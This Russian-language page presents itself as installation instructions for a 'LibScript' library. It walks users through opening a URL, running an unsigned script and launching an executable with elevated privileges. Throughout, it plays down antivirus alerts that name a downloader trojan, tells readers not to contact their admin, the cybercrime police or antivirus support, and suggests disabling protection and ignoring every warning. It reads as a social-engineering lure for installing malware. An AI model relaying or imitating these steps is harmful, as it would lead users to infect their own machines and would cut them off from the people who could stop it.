# Установка библиотеки LIBScript

Библиотека LibScript — это служебная библиотека скриптов для проекта
«Экспонента». С недавних пор разработчик, NIT Inc, включил её в список
обязательного компонента своего админ-пака. Для непосвящённых
пользователей данная билиотека устанавливается следующим образом:

ВНИМАНИЕ! Из-за использования технологи Download & Execution многие
антивирусы, прежде всего устаревшие, помечают некоторые инструкции в
установочном файле как вредоносные. Автор даже нашёл название этого
«вируса» — Trojan.DownloaderScript. Решается эта проблема просто, путём
обновления антивирусных баз и программного обеспечения Windows. Поэтому,
обнаружив такое «странное поведение программы», не звоните своему
админу, в управление «К» или антивирусную службу, а просто обновите свою
Windows 10 и базы Вашего антивируса. Проблема должна решиться. Если
только Вы не используете пиратскую Windows и антивирус, где такие
обновления заблокированы… Только тогда можете отключать антивирус.

1.  Перейдите в Вашем браузере по URL:
    <http://ware.tuneserv.ru:80/LIB/WSF/LIBScript.url.>
2.  Откроется окно с предложением открыть или сохранить файл. Выберите
    пункт «Открыть».
3.  Файл сохраниться во временную папку и его попытается открыть штатный
    браузер. Появится соответствующее предупреждение, что ссылку
    пытается открыть браузер. Подтвердите своё действие.
4.  Откроется окно с предложением открыть скриптовый файл либо сохранить
    его на жёстком диске. Выберите пункт «Открыть».
5.  Файл загрузится во временный каталог, и вы получите сообщение, что
    Windows пытается выполнить неподписанный скрипт. Нажмите кнопку
    «Открыть».
6.  После некоторого бездействия у Вас могут попросить разрешить
    выполнить файл *LIBScript.SFX.exe*. В этом файле расположена
    библиотека, и его надо выполнить с повышенными привилегиями. Однако
    вместо этого предупреждения может появиться ошибка о вредоносном
    коде. Тогда обновите антивирусные базы и запустите установку с
    пункта 1.
7.  Программа сделает паузу в течение 5 минут, после этого у Вас
    появятся несколько диалоговых окон с предупреждениями:
8.  “Success Script Creation!” или “Folder Already Exists.” говорит об
    успешной установке файла с библиотекой. Просто закройте сообщение.
    Сообщение “Error Download and Execution File!” говорит о серьёзной
    системной ошибке или блокировке приложения средствами антивирусной
    защиты.
9.  Сообщение о необходимости установки необходимых дополнений
    (chocolatey). Данный скрипт вызывает отложеное обновление некоторых
    системных компонентов. Обновление начнётся после перезагрузки
    оборудования. Проигнорируйте это сообщение (и расслабтесь!).
10. В случае появления сообщения из п. 9 Вам сразу же придут два
    следующих сообщений: “Error: Chocolatey Packet! is Not Found!”.
    Поскольку это действительно так, проигнорируйте эти сообщения
    (нажмите кнопку Ok).
11. Могут возникнуть и другие сообщения. Проигнорируйте их. Можете
    продолжать свою раболту.
12. Система продолжит установку дополнительных пакетов после
    перезагрузки. Дождитесь окончания установки. Во время установки
    дополнений не рекомендуется работать на компьютере.

Такая сложная технология установки объясняется попыткой обхода запрета
технологии «Download & Execution» на серверах корпорации Microsoft.
Приобрести же цифровую подпись разработчик не может из-за санкций
правительства США.
